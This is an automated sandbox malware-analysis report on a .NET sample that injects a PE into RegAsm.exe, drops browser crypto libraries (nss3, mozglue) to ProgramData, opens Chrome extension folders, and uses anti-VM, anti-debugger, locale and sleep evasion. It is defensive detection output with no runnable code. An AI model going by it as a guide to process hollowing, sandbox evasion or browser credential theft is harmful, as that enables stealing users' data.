Source: RegAsm.exe, 00000003.00000002.1852727545.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1838092023.000000001B666000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000003.00000002.1852727545.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1838092023.000000001B666000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: RegAsm.exe String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: RegAsm.exe String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.1853131872.000000006C36D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.1854092669.000000006C52F000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source: Binary string: c:\rje\tg\k\obj\Release\ojc.pdb source: file.exe
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source: Binary string: c:\rje\tg\k\obj\Release\ojc.pdbX source: file.exe
Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.1854092669.000000006C52F000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.1853131872.000000006C36D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_00419860
PE file contains sections with non-standard names
Source: msvcp140.dll.3.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.3.dr Static PE information: section name: .didat
Source: nss3.dll.3.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.3.dr Static PE information: section name: .00cfg
Source: softokn3.dll.3.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.3.dr Static PE information: section name: .00cfg
Source: freebl3.dll.3.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.3.dr Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.3.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041B035 push ecx; ret 3_2_0041B048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C32B536 push ecx; ret 3_2_6C32B549
Source: file.exe Static PE information: section name: .text entropy: 7.994101274971393
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_00419860
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\file.exe Memory allocated: 6C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 2590000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 23C0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 6.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 7460 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 3_2_0040E430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 3_2_00414910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 3_2_0040BE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 3_2_004016D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 3_2_0040DA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 3_2_00413EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_0040F6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose, 3_2_004138B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 3_2_00414570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose, 3_2_0040ED20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 3_2_0040DE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00401160 GetSystemInfo,ExitProcess, 3_2_00401160
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: RegAsm.exe, 00000003.00000002.1820758252.000000000145A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
Source: RegAsm.exe, 00000003.00000002.1820758252.00000000014BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 00000003.00000002.1820758252.000000000145A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: RegAsm.exe, 00000003.00000002.1820758252.00000000014BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0041AD48
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004045C0 VirtualProtect ?,00000004,00000100,00000000 3_2_004045C0
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_00419860
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00419750 mov eax, dword ptr fs:[00000030h] 3_2_00419750
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA, 3_2_00417850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0041AD48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041CEEA SetUnhandledExceptionFilter, 3_2_0041CEEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0041B33A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C32B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6C32B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C32B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6C32B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C4DAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6C4DAC62
Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 7404, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7476, type: MEMORYSTR
.NET source code references suspicious native API functions
Source: file.exe, Program.cs Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0259212D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread, 0_2_0259212D
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Searches for specific processes (likely to inject)
